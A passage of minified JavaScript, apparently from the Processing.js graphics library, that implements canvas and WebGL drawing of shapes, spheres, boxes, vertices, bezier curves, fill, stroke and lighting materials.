ef=-2/(ed-ee);var ec=-(ej+d8)/(ej-d8);var eb=-(eh+d7)/(eh-d7);var ea=-(ed+ee)/(ed-ee);da=new aM;da.set(ei,0,0,ec,0,eg,0,eb,0,0,ef,ea,0,0,0,1);var d9=new aM;d9.set(da);d9.transpose();d4.useProgram(dM);a5("projection2d",dM,"projection",false,d9.array());d4.useProgram(du);a5("projection3d",du,"projection",false,d9.array());d4.useProgram(bQ);a5("uProjectionUS",bQ,"uProjection",false,d9.array());ch=false};cV.printProjection=function(){da.print()};cV.printCamera=function(){bT.print()};bO.prototype.box=dp.prototype.a3DOnlyFunction;by.prototype.box=function(d9,ec,ee){if(!ec||!ee){ec=ee=d9}var eb=new aM;eb.scale(d9,ec,ee);var d8=new aM;d8.scale(1,-1,1);d8.apply(dF.array());d8.transpose();if(aF){d4.useProgram(du);a5("model3d",du,"model",false,eb.array());a5("view3d",du,"view",false,d8.array());d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",bl);if(dH>0){var ea=new aM;ea.set(d8);var d7=new aM;d7.set(eb);ea.mult(d7);var ed=new aM;ed.set(ea);ed.invert();ed.transpose();a5("normalTransform3d",du,"normalTransform",false,ed.array());db("normal3d",du,"Normal",3,cI)}else{cf("normal3d",du,"Normal")}db("vertex3d",du,"Vertex",3,bd);cf("aColor3d",du,"aColor");cf("aTexture3d",du,"aTexture");d4.drawArrays(d4.TRIANGLES,0,df.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)}if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,eb.array());a5("view2d",dM,"view",false,d8.array());dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,di);cf("aTextureCoord2d",dM,"aTextureCoord");d4.drawArrays(d4.LINES,0,bE.length/3)}};var cC=function(){var d8;cE=[];for(d8=0;d8<bK;d8++){cE.push(0);cE.push(-1);cE.push(0);cE.push(bq[d8]);cE.push(bp[d8]);cE.push(bo[d8])}cE.push(0);cE.push(-1);cE.push(0);cE.push(bq[0]);cE.push(bp[0]);cE.push(bo[0]);var ec,d9,eb;var ea=0;for(d8=2;d8<bJ;d8++){ec=d9=ea;ea+=bK;eb=ea;for(var d7=0;d7<bK;d7++){cE.push(bq[ec]);cE.push(bp[ec]);cE.push(bo[ec++]);cE.push(bq[eb]);cE.push(bp[eb]);cE.push(bo[eb++])}ec=d9;eb=ea;cE.push(bq[ec]);cE.push(bp[ec]);cE.push(bo[ec]);cE.push(bq[eb]);cE.push(bp[eb]);cE.push(bo[eb])}for(d8=0;d8<bK;d8++){eb=ea+d8;cE.push(bq[eb]);cE.push(bp[eb]);cE.push(bo[eb]);cE.push(0);cE.push(1);cE.push(0)}cE.push(bq[ea]);cE.push(bp[ea]);cE.push(bo[ea]);cE.push(0);cE.push(1);cE.push(0);d4.bindBuffer(d4.ARRAY_BUFFER,bc);d4.bufferData(d4.ARRAY_BUFFER,new e(cE),d4.STATIC_DRAW)};cV.sphereDetail=function(d8,ej){var ee;if(arguments.length===1){d8=ej=arguments[0]}if(d8<3){d8=3}if(ej<2){ej=2}if(d8===bK&&ej===bJ){return}var ei=720/d8;var ec=new e(d8);var d9=new e(d8);for(ee=0;ee<d8;ee++){ec[ee]=bi[ee*ei%720|0];d9[ee]=ag[ee*ei%720|0]}var eh=d8*(ej-1)+2;var eg=0;bq=new e(eh);bp=new e(eh);bo=new e(eh);var ef=720*0.5/ej;var eb=ef;for(ee=1;ee<ej;ee++){var ea=ag[eb%720|0];var d7=-bi[eb%720|0];for(var ed=0;ed<d8;ed++){bq[eg]=ec[ed]*ea;bp[eg]=d7;bo[eg++]=d9[ed]*ea}eb+=ef}bK=d8;bJ=ej;cC()};bO.prototype.sphere=dp.prototype.a3DOnlyFunction;by.prototype.sphere=function(){var eb=arguments[0];if(bK<3||bJ<2){cV.sphereDetail(30)}var ea=new aM;ea.scale(eb,eb,eb);var d8=new aM;d8.scale(1,-1,1);d8.apply(dF.array());d8.transpose();if(aF){if(dH>0){var d9=new aM;d9.set(d8);var d7=new aM;d7.set(ea);d9.mult(d7);var ec=new aM;ec.set(d9);ec.invert();ec.transpose();a5("normalTransform3d",du,"normalTransform",false,ec.array());db("normal3d",du,"Normal",3,bc)}else{cf("normal3d",du,"Normal")}d4.useProgram(du);cf("aTexture3d",du,"aTexture");a5("model3d",du,"model",false,ea.array());a5("view3d",du,"view",false,d8.array());db("vertex3d",du,"Vertex",3,bc);cf("aColor3d",du,"aColor");d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",bl);d4.drawArrays(d4.TRIANGLE_STRIP,0,cE.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)}if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,ea.array());a5("view2d",dM,"view",false,d8.array());db("vertex2d",dM,"Vertex",3,bc);cf("aTextureCoord2d",dM,"aTextureCoord");dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);d4.drawArrays(d4.LINE_STRIP,0,cE.length/3)}};cV.modelX=function(ed,ec,eb){var ef=dF.array();var eh=cg.array();var d7=ef[0]*ed+ef[1]*ec+ef[2]*eb+ef[3];var eg=ef[4]*ed+ef[5]*ec+ef[6]*eb+ef[7];var ee=ef[8]*ed+ef[9]*ec+ef[10]*eb+ef[11];var d8=ef[12]*ed+ef[13]*ec+ef[14]*eb+ef[15];var d9=eh[0]*d7+eh[1]*eg+eh[2]*ee+eh[3]*d8;var ea=eh[12]*d7+eh[13]*eg+eh[14]*ee+eh[15]*d8;return ea!==0?d9/ea:d9};cV.modelY=function(ed,ec,eb){var ef=dF.array();var eh=cg.array();var d7=ef[0]*ed+ef[1]*ec+ef[2]*eb+ef[3];var eg=ef[4]*ed+ef[5]*ec+ef[6]*eb+ef[7];var ee=ef[8]*ed+ef[9]*ec+ef[10]*eb+ef[11];var d8=ef[12]*ed+ef[13]*ec+ef[14]*eb+ef[15];var d9=eh[4]*d7+eh[5]*eg+eh[6]*ee+eh[7]*d8;var ea=eh[12]*d7+eh[13]*eg+eh[14]*ee+eh[15]*d8;return ea!==0?d9/ea:d9};cV.modelZ=function(ed,ec,eb){var ef=dF.array();var eh=cg.array();var d7=ef[0]*ed+ef[1]*ec+ef[2]*eb+ef[3];var eg=ef[4]*ed+ef[5]*ec+ef[6]*eb+ef[7];var ee=ef[8]*ed+ef[9]*ec+ef[10]*eb+ef[11];var d9=ef[12]*ed+ef[13]*ec+ef[14]*eb+ef[15];var d8=eh[8]*d7+eh[9]*eg+eh[10]*ee+eh[11]*d9;var ea=eh[12]*d7+eh[13]*eg+eh[14]*ee+eh[15]*d9;return ea!==0?d8/ea:d8};bO.prototype.ambient=dp.prototype.a3DOnlyFunction;by.prototype.ambient=function(ea,d9,d8){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);var d7=cV.color(ea,d9,d8);dY("mat_ambient3d",du,"mat_ambient",cV.color.toGLArray(d7).slice(0,3))};bO.prototype.emissive=dp.prototype.a3DOnlyFunction;by.prototype.emissive=function(ea,d9,d8){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);var d7=cV.color(ea,d9,d8);dY("mat_emissive3d",du,"mat_emissive",cV.color.toGLArray(d7).slice(0,3))};bO.prototype.shininess=dp.prototype.a3DOnlyFunction;by.prototype.shininess=function(d7){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);dY("shininess3d",du,"shininess",d7)};bO.prototype.specular=dp.prototype.a3DOnlyFunction;by.prototype.specular=function(ea,d9,d8){d4.useProgram(du);dV("usingMat3d",du,"usingMat",true);var d7=cV.color(ea,d9,d8);dY("mat_specular3d",du,"mat_specular",cV.color.toGLArray(d7).slice(0,3))};cV.screenX=function(ee,ed,ec){var eg=dF.array();if(eg.length===16){var d7=eg[0]*ee+eg[1]*ed+eg[2]*ec+eg[3];var eh=eg[4]*ee+eg[5]*ed+eg[6]*ec+eg[7];var ef=eg[8]*ee+eg[9]*ed+eg[10]*ec+eg[11];var d8=eg[12]*ee+eg[13]*ed+eg[14]*ec+eg[15];var eb=da.array();var d9=eb[0]*d7+eb[1]*eh+eb[2]*ef+eb[3]*d8;var ea=eb[12]*d7+eb[13]*eh+eb[14]*ef+eb[15]*d8;if(ea!==0){d9/=ea}return cV.width*(1+d9)/2}return dF.multX(ee,ed)};cV.screenY=function az(ee,ed,ec){var eg=dF.array();if(eg.length===16){var d7=eg[0]*ee+eg[1]*ed+eg[2]*ec+eg[3];var eh=eg[4]*ee+eg[5]*ed+eg[6]*ec+eg[7];var ef=eg[8]*ee+eg[9]*ed+eg[10]*ec+eg[11];var d8=eg[12]*ee+eg[13]*ed+eg[14]*ec+eg[15];var eb=da.array();var d9=eb[4]*d7+eb[5]*eh+eb[6]*ef+eb[7]*d8;var ea=eb[12]*d7+eb[13]*eh+eb[14]*ef+eb[15]*d8;if(ea!==0){d9/=ea}return cV.height*(1+d9)/2}return dF.multY(ee,ed)};cV.screenZ=function ax(ee,ed,ec){var eg=dF.array();if(eg.length!==16){return 0}var eb=da.array();var d7=eg[0]*ee+eg[1]*ed+eg[2]*ec+eg[3];var eh=eg[4]*ee+eg[5]*ed+eg[6]*ec+eg[7];var ef=eg[8]*ee+eg[9]*ed+eg[10]*ec+eg[11];var d9=eg[12]*ee+eg[13]*ed+eg[14]*ec+eg[15];var d8=eb[8]*d7+eb[9]*eh+eb[10]*ef+eb[11]*d9;var ea=eb[12]*d7+eb[13]*eh+eb[14]*ef+eb[15]*d9;if(ea!==0){d8/=ea}return(d8+1)/2};dp.prototype.fill=function(){var d7=cV.color(arguments[0],arguments[1],arguments[2],arguments[3]);if(d7===aX&&aF){return}aF=true;aX=d7};bO.prototype.fill=function(){dp.prototype.fill.apply(this,arguments);ap=true};by.prototype.fill=function(){dp.prototype.fill.apply(this,arguments);bl=cV.color.toGLArray(aX)};function bk(){if(aF){if(ap){d4.fillStyle=cV.color.toString(aX);ap=false}d4.fill()}}cV.noFill=function(){aF=false};dp.prototype.stroke=function(){var d7=cV.color(arguments[0],arguments[1],arguments[2],arguments[3]);if(d7===cu&&cd){return}cd=true;cu=d7};bO.prototype.stroke=function(){dp.prototype.stroke.apply(this,arguments);b2=true};by.prototype.stroke=function(){dp.prototype.stroke.apply(this,arguments);cZ=cV.color.toGLArray(cu)};function dc(){if(cd){if(b2){d4.strokeStyle=cV.color.toString(cu);b2=false}d4.stroke()}}cV.noStroke=function(){cd=false};dp.prototype.strokeWeight=function(d7){dS=d7};bO.prototype.strokeWeight=function(d7){dp.prototype.strokeWeight.apply(this,arguments);d4.lineWidth=d7};by.prototype.strokeWeight=function(d7){dp.prototype.strokeWeight.apply(this,arguments);d4.useProgram(dM);dY("pointSize2d",dM,"pointSize",d7);d4.useProgram(bQ);dY("pointSizeUnlitShape",bQ,"pointSize",d7);d4.lineWidth(d7)};cV.strokeCap=function(d7){dU.$ensureContext().lineCap=d7};cV.strokeJoin=function(d7){dU.$ensureContext().lineJoin=d7};bO.prototype.smooth=function(){dK=true;var d7=ac.style;d7.setProperty("image-rendering","optimizeQuality","important");d7.setProperty("-ms-interpolation-mode","bicubic","important");if(d4.hasOwnProperty("mozImageSmoothingEnabled")){d4.mozImageSmoothingEnabled=true}};by.prototype.smooth=E;bO.prototype.noSmooth=function(){dK=false;var d7=ac.style;d7.setProperty("image-rendering","optimizeSpeed","important");d7.setProperty("image-rendering","-moz-crisp-edges","important");d7.setProperty("image-rendering","-webkit-optimize-contrast","important");d7.setProperty("image-rendering","optimize-contrast","important");d7.setProperty("-ms-interpolation-mode","nearest-neighbor","important");if(d4.hasOwnProperty("mozImageSmoothingEnabled")){d4.mozImageSmoothingEnabled=false}};by.prototype.noSmooth=E;bO.prototype.point=function(d7,d8){if(!cd){return}d7=o.round(d7);d8=o.round(d8);d4.fillStyle=cV.color.toString(cu);ap=true;if(dS>1){d4.beginPath();d4.arc(d7,d8,dS/2,0,6.283185307179586,false);d4.fill()}else{d4.fillRect(d7,d8,1,1)}};by.prototype.point=function(d7,eb,ea){var d9=new aM;d9.translate(d7,eb,ea||0);d9.transpose();var d8=new aM;d8.scale(1,-1,1);d8.apply(dF.array());d8.transpose();d4.useProgram(dM);a5("model2d",dM,"model",false,d9.array());a5("view2d",dM,"view",false,d8.array());if(dS>0&&cd){dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,av);cf("aTextureCoord2d",dM,"aTextureCoord");d4.drawArrays(d4.POINTS,0,1)}};cV.beginShape=function(d7){dN=d7;d2=[];a7=[]};bO.prototype.vertex=function(d7,eb,ea,d9){var d8=[];if(dr){dr=false}d8.isVert=true;d8[0]=d7;d8[1]=eb;d8[2]=0;d8[3]=ea;d8[4]=d9;d8[5]=aX;d8[6]=cu;a7.push(d8)};by.prototype.vertex=function(d7,ec,eb,ea,d9){var d8=[];if(dr){dr=false}d8.isVert=true;if(d9===r&&dP){d9=ea;ea=eb;eb=0}if(ea!==r&&d9!==r){if(d0===2){ea/=cr.width;d9/=cr.height}ea=ea>1?1:ea;ea=ea<0?0:ea;d9=d9>1?1:d9;d9=d9<0?0:d9}d8[0]=d7;d8[1]=ec;d8[2]=eb||0;d8[3]=ea||0;d8[4]=d9||0;d8[5]=bl[0];d8[6]=bl[1];d8[7]=bl[2];d8[8]=bl[3];d8[9]=cZ[0];d8[10]=cZ[1];d8[11]=cZ[2];d8[12]=cZ[3];d8[13]=a4;d8[14]=a3;d8[15]=a2;a7.push(d8)};var dX=function(d9,d8){var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();d4.useProgram(bQ);a5("uViewUS",bQ,"uView",false,d7.array());db("aVertexUS",bQ,"aVertex",3,av);d4.bufferData(d4.ARRAY_BUFFER,new e(d9),d4.STREAM_DRAW);db("aColorUS",bQ,"aColor",4,aE);d4.bufferData(d4.ARRAY_BUFFER,new e(d8),d4.STREAM_DRAW);d4.drawArrays(d4.POINTS,0,d9.length/3)};var bg=function(eb,ea,d9){var d8;if(ea==="LINES"){d8=d4.LINES}else{if(ea==="LINE_LOOP"){d8=d4.LINE_LOOP}else{d8=d4.LINE_STRIP}}var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();d4.useProgram(bQ);a5("uViewUS",bQ,"uView",false,d7.array());db("aVertexUS",bQ,"aVertex",3,b7);d4.bufferData(d4.ARRAY_BUFFER,new e(eb),d4.STREAM_DRAW);db("aColorUS",bQ,"aColor",4,bz);d4.bufferData(d4.ARRAY_BUFFER,new e(d9),d4.STREAM_DRAW);d4.drawArrays(d8,0,eb.length/3)};var dk=function(ec,eb,ea,d9){var d8;if(eb==="TRIANGLES"){d8=d4.TRIANGLES}else{if(eb==="TRIANGLE_FAN"){d8=d4.TRIANGLE_FAN}else{d8=d4.TRIANGLE_STRIP}}var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();d4.useProgram(du);a5("model3d",du,"model",false,[1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]);a5("view3d",du,"view",false,d7.array());d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",[-1,0,0,0]);db("vertex3d",du,"Vertex",3,ar);d4.bufferData(d4.ARRAY_BUFFER,new e(ec),d4.STREAM_DRAW);if(dP&&bb!==null){bt(ea)}db("aColor3d",du,"aColor",4,aE);d4.bufferData(d4.ARRAY_BUFFER,new e(ea),d4.STREAM_DRAW);cf("normal3d",du,"Normal");if(dP){dV("usingTexture3d",du,"usingTexture",dP);db("aTexture3d",du,"aTexture",2,ae);d4.bufferData(d4.ARRAY_BUFFER,new e(d9),d4.STREAM_DRAW)}d4.drawArrays(d8,0,ec.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)};function cR(){bk();dc();d4.closePath()}bO.prototype.endShape=function(ee){if(a7.length===0){return}var ea=ee===2;if(ea){a7.push(a7[0])}var d9=[];var d7=[];var eg=[];var ej=[];var ec=[];var ef;dr=true;var ed,eb,d8;var ei=a7.length;for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d7.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=5;eb<9;eb++){eg.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];ec.push(ef[3]);ec.push(ef[4])}if(dL&&(dN===20||dN===r)){if(ei>3){var eh=[],ek=1-aH;d4.beginPath();d4.moveTo(a7[1][0],a7[1][1]);for(ed=1;ed+2<ei;ed++){ef=a7[ed];eh[0]=[ef[0],ef[1]];eh[1]=[ef[0]+(ek*a7[ed+1][0]-ek*a7[ed-1][0])/6,ef[1]+(ek*a7[ed+1][1]-ek*a7[ed-1][1])/6];eh[2]=[a7[ed+1][0]+(ek*a7[ed][0]-ek*a7[ed+2][0])/6,a7[ed+1][1]+(ek*a7[ed][1]-ek*a7[ed+2][1])/6];eh[3]=[a7[ed+1][0],a7[ed+1][1]];d4.bezierCurveTo(eh[1][0],eh[1][1],eh[2][0],eh[2][1],eh[3][0],eh[3][1])}cR()}}else{if(Y&&(dN===20||dN===r)){d4.beginPath();for(ed=0;ed<ei;ed++){ef=a7[ed];if(a7[ed]["isVert"]){if(a7[ed]["moveTo"]){d4.moveTo(ef[0],ef[1])}else{d4.lineTo(ef[0],ef[1])}}else{d4.bezierCurveTo(a7[ed][0],a7[ed][1],a7[ed][2],a7[ed][3],a7[ed][4],a7[ed][5])}}cR()}else{if(dN===2){for(ed=0;ed<ei;ed++){ef=a7[ed];if(cd){cV.stroke(ef[6])}cV.point(ef[0],ef[1])}}else{if(dN===4){for(ed=0;ed+1<ei;ed+=2){ef=a7[ed];if(cd){cV.stroke(a7[ed+1][6])}cV.line(ef[0],ef[1],a7[ed+1][0],a7[ed+1][1])}}else{if(dN===9){for(ed=0;ed+2<ei;ed+=3){ef=a7[ed];d4.beginPath();d4.moveTo(ef[0],ef[1]);d4.lineTo(a7[ed+1][0],a7[ed+1][1]);d4.lineTo(a7[ed+2][0],a7[ed+2][1]);d4.lineTo(ef[0],ef[1]);if(aF){cV.fill(a7[ed+2][5]);bk()}if(cd){cV.stroke(a7[ed+2][6]);dc()}d4.closePath()}}else{if(dN===10){for(ed=0;ed+1<ei;ed++){ef=a7[ed];d4.beginPath();d4.moveTo(a7[ed+1][0],a7[ed+1][1]);d4.lineTo(ef[0],ef[1]);if(cd){cV.stroke(a7[ed+1][6])}if(aF){cV.fill(a7[ed+1][5])}if(ed+2<ei){d4.lineTo(a7[ed+2][0],a7[ed+2][1]);if(cd){cV.stroke(a7[ed+2][6])}if(aF){cV.fill(a7[ed+2][5])}}cR()}}else{if(dN===11){if(ei>2){d4.beginPath();d4.moveTo(a7[0][0],a7[0][1]);d4.lineTo(a7[1][0],a7[1][1]);d4.lineTo(a7[2][0],a7[2][1]);if(aF){cV.fill(a7[2][5]);bk()}if(cd){cV.stroke(a7[2][6]);dc()}d4.closePath();for(ed=3;ed<ei;ed++){ef=a7[ed];d4.beginPath();d4.moveTo(a7[0][0],a7[0][1]);d4.lineTo(a7[ed-1][0],a7[ed-1][1]);d4.lineTo(ef[0],ef[1]);if(aF){cV.fill(ef[5]);bk()}if(cd){cV.stroke(ef[6]);dc()}d4.closePath()}}}else{if(dN===16){for(ed=0;ed+3<ei;ed+=4){ef=a7[ed];d4.beginPath();d4.moveTo(ef[0],ef[1]);for(eb=1;eb<4;eb++){d4.lineTo(a7[ed+eb][0],a7[ed+eb][1])}d4.lineTo(ef[0],ef[1]);if(aF){cV.fill(a7[ed+3][5]);bk()}if(cd){cV.stroke(a7[ed+3][6]);dc()}d4.closePath()}}else{if(dN===17){if(ei>3){for(ed=0;ed+1<ei;ed+=2){ef=a7[ed];d4.beginPath();if(ed+3<ei){d4.moveTo(a7[ed+2][0],a7[ed+2][1]);d4.lineTo(ef[0],ef[1]);d4.lineTo(a7[ed+1][0],a7[ed+1][1]);d4.lineTo(a7[ed+3][0],a7[ed+3][1]);if(aF){cV.fill(a7[ed+3][5])}if(cd){cV.stroke(a7[ed+3][6])}}else{d4.moveTo(ef[0],ef[1]);d4.lineTo(a7[ed+1][0],a7[ed+1][1])}cR()}}}else{d4.beginPath();d4.moveTo(a7[0][0],a7[0][1]);for(ed=1;ed<ei;ed++){ef=a7[ed];if(ef.isVert){if(ef.moveTo){d4.moveTo(ef[0],ef[1])}else{d4.lineTo(ef[0],ef[1])}}}cR()}}}}}}}}}dL=false;Y=false;ca=[];c1=0;if(ea){a7.pop()}};by.prototype.endShape=function(ee){if(a7.length===0){return}var ea=ee===2;var d9=[];var d7=[];var eg=[];var ej=[];var ec=[];var ef;dr=true;var ed,eb,d8;var ei=a7.length;for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d7.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=5;eb<9;eb++){eg.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];ec.push(ef[3]);ec.push(ef[4])}if(ea){d7.push(a7[0][0]);d7.push(a7[0][1]);d7.push(a7[0][2]);for(ed=5;ed<9;ed++){eg.push(a7[0][ed])}for(ed=9;ed<13;ed++){ej.push(a7[0][ed])}ec.push(a7[0][3]);ec.push(a7[0][4])}if(dL&&(dN===20||dN===r)){d9=d7;if(cd){bg(d9,null,ej)}if(aF){dk(d7,null,eg)}}else{if(Y&&(dN===20||dN===r)){d9=d7;d9.splice(d9.length-3);ej.splice(ej.length-4);if(cd){bg(d9,null,ej)}if(aF){dk(d7,"TRIANGLES",eg)}}else{if(dN===2){for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}dX(d9,ej)}else{if(dN===4){for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=5;eb<9;eb++){eg.push(ef[eb])}}bg(d9,"LINES",ej)}else{if(dN===9){if(ei>2){for(ed=0;ed+2<ei;ed+=3){d7=[];ec=[];d9=[];eg=[];ej=[];for(eb=0;eb<3;eb++){for(d8=0;d8<3;d8++){d9.push(a7[ed+eb][d8]);d7.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=3;d8<5;d8++){ec.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=5;d8<9;d8++){eg.push(a7[ed+eb][d8]);ej.push(a7[ed+eb][d8+4])}}if(cd){bg(d9,"LINE_LOOP",ej)}if(aF||dP){dk(d7,"TRIANGLES",eg,ec)}}}}else{if(dN===10){if(ei>2){for(ed=0;ed+2<ei;ed++){d9=[];d7=[];ej=[];eg=[];ec=[];for(eb=0;eb<3;eb++){for(d8=0;d8<3;d8++){d9.push(a7[ed+eb][d8]);d7.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=3;d8<5;d8++){ec.push(a7[ed+eb][d8])}}for(eb=0;eb<3;eb++){for(d8=5;d8<9;d8++){ej.push(a7[ed+eb][d8+4]);eg.push(a7[ed+eb][d8])}}if(aF||dP){dk(d7,"TRIANGLE_STRIP",eg,ec)}if(cd){bg(d9,"LINE_LOOP",ej)}}}}else{if(dN===11){if(ei>2){for(ed=0;ed<3;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}for(ed=0;ed<3;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}if(cd){bg(d9,"LINE_LOOP",ej)}for(ed=2;ed+1<ei;ed++){d9=[];ej=[];d9.push(a7[0][0]);d9.push(a7[0][1]);d9.push(a7[0][2]);ej.push(a7[0][9]);ej.push(a7[0][10]);ej.push(a7[0][11]);ej.push(a7[0][12]);for(eb=0;eb<2;eb++){for(d8=0;d8<3;d8++){d9.push(a7[ed+eb][d8])}}for(eb=0;eb<2;eb++){for(d8=9;d8<13;d8++){ej.push(a7[ed+eb][d8])}}if(cd){bg(d9,"LINE_STRIP",ej)}}if(aF||dP){dk(d7,"TRIANGLE_FAN",eg,ec)}}}else{if(dN===16){for(ed=0;ed+3<ei;ed+=4){d9=[];for(eb=0;eb<4;eb++){ef=a7[ed+eb];for(d8=0;d8<3;d8++){d9.push(ef[d8])}}if(cd){bg(d9,"LINE_LOOP",ej)}if(aF){d7=[];eg=[];ec=[];for(eb=0;eb<3;eb++){d7.push(a7[ed][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed][eb])}for(eb=0;eb<3;eb++){d7.push(a7[ed+1][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed+1][eb])}for(eb=0;eb<3;eb++){d7.push(a7[ed+3][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed+3][eb])}for(eb=0;eb<3;eb++){d7.push(a7[ed+2][eb])}for(eb=5;eb<9;eb++){eg.push(a7[ed+2][eb])}if(dP){ec.push(a7[ed+0][3]);ec.push(a7[ed+0][4]);ec.push(a7[ed+1][3]);ec.push(a7[ed+1][4]);ec.push(a7[ed+3][3]);ec.push(a7[ed+3][4]);ec.push(a7[ed+2][3]);ec.push(a7[ed+2][4])}dk(d7,"TRIANGLE_STRIP",eg,ec)}}}else{if(dN===17){var eh=[];if(ei>3){for(ed=0;ed<2;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}}for(ed=0;ed<2;ed++){ef=a7[ed];for(eb=9;eb<13;eb++){ej.push(ef[eb])}}bg(d9,"LINE_STRIP",ej);if(ei>4&&ei%2>0){eh=d7.splice(d7.length-3);a7.pop()}for(ed=0;ed+3<ei;ed+=2){d9=[];ej=[];for(eb=0;eb<3;eb++){d9.push(a7[ed+1][eb])}for(eb=0;eb<3;eb++){d9.push(a7[ed+3][eb])}for(eb=0;eb<3;eb++){d9.push(a7[ed+2][eb])}for(eb=0;eb<3;eb++){d9.push(a7[ed+0][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+1][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+3][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+2][eb])}for(eb=9;eb<13;eb++){ej.push(a7[ed+0][eb])}if(cd){bg(d9,"LINE_STRIP",ej)}}if(aF||dP){dk(d7,"TRIANGLE_LIST",eg,ec)}}}else{if(ei===1){for(eb=0;eb<3;eb++){d9.push(a7[0][eb])}for(eb=9;eb<13;eb++){ej.push(a7[0][eb])}dX(d9,ej)}else{for(ed=0;ed<ei;ed++){ef=a7[ed];for(eb=0;eb<3;eb++){d9.push(ef[eb])}for(eb=5;eb<9;eb++){ej.push(ef[eb])}}if(cd&&ea){bg(d9,"LINE_LOOP",ej)}else{if(cd&&!ea){bg(d9,"LINE_STRIP",ej)}}if(aF||dP){dk(d7,"TRIANGLE_FAN",eg,ec)}}}}}}}}}dP=false;d4.useProgram(du);dV("usingTexture3d",du,"usingTexture",dP)}}dL=false;Y=false;ca=[];c1=0};var aU=function(ea,d9){var eb=1/ea;var d8=eb*eb;var d7=d8*eb;d9.set(0,0,0,1,d7,d8,eb,0,6*d7,2*d8,0,0,6*d7,0,0,0)};var dn=function(){if(!aJ){c2=new aM;aJ=new aM;cL=true}var d7=aH;c2.set((d7-1)/2,(d7+3)/2,(-3-d7)/2,(1-d7)/2,1-d7,(-5-d7)/2,d7+2,(d7-1)/2,(d7-1)/2,0,(1-d7)/2,0,0,1,0,0);aU(O,aJ);if(!cc){aN=new aM}aN.set(c2);aN.preApply(cc);aJ.apply(c2)};bO.prototype.bezierVertex=function(){Y=true;var d7=[];if(dr){throw"vertex() must be used at least once before calling bezierVertex()"}for(var d8=0;d8<arguments.length;d8++){d7[d8]=arguments[d8]}a7.push(d7);a7[a7.length-1]["isVert"]=false};by.prototype.bezierVertex=function(){Y=true;var ee=[];if(dr){throw"vertex() must be used at least once before calling bezierVertex()"}if(arguments.length===9){if(bw===r){bw=new aM}var ej=a7.length-1;aU(cx,bw);bw.apply(S);var el=bw.array();var ea=a7[ej][0],ek=a7[ej][1],ed=a7[ej][2];var eg=el[4]*ea+el[5]*arguments[0]+el[6]*arguments[3]+el[7]*arguments[6];var ef=el[8]*ea+el[9]*arguments[0]+el[10]*arguments[3]+el[11]*arguments[6];var ec=el[12]*ea+el[13]*arguments[0]+el[14]*arguments[3]+el[15]*arguments[6];var em=el[4]*ek+el[5]*arguments[1]+el[6]*arguments[4]+el[7]*arguments[7];var ei=el[8]*ek+el[9]*arguments[1]+el[10]*arguments[4]+el[11]*arguments[7];var eh=el[12]*ek+el[13]*arguments[1]+el[14]*arguments[4]+el[15]*arguments[7];var d9=el[4]*ed+el[5]*arguments[2]+el[6]*arguments[5]+el[7]*arguments[8];var d8=el[8]*ed+el[9]*arguments[2]+el[10]*arguments[5]+el[11]*arguments[8];var d7=el[12]*ed+el[13]*arguments[2]+el[14]*arguments[5]+el[15]*arguments[8];for(var eb=0;eb<cx;eb++){ea+=eg;eg+=ef;ef+=ec;ek+=em;em+=ei;ei+=eh;ed+=d9;d9+=d8;d8+=d7;cV.vertex(ea,ek,ed)}cV.vertex(arguments[6],arguments[7],arguments[8])}};cV.texture=function(ea){var 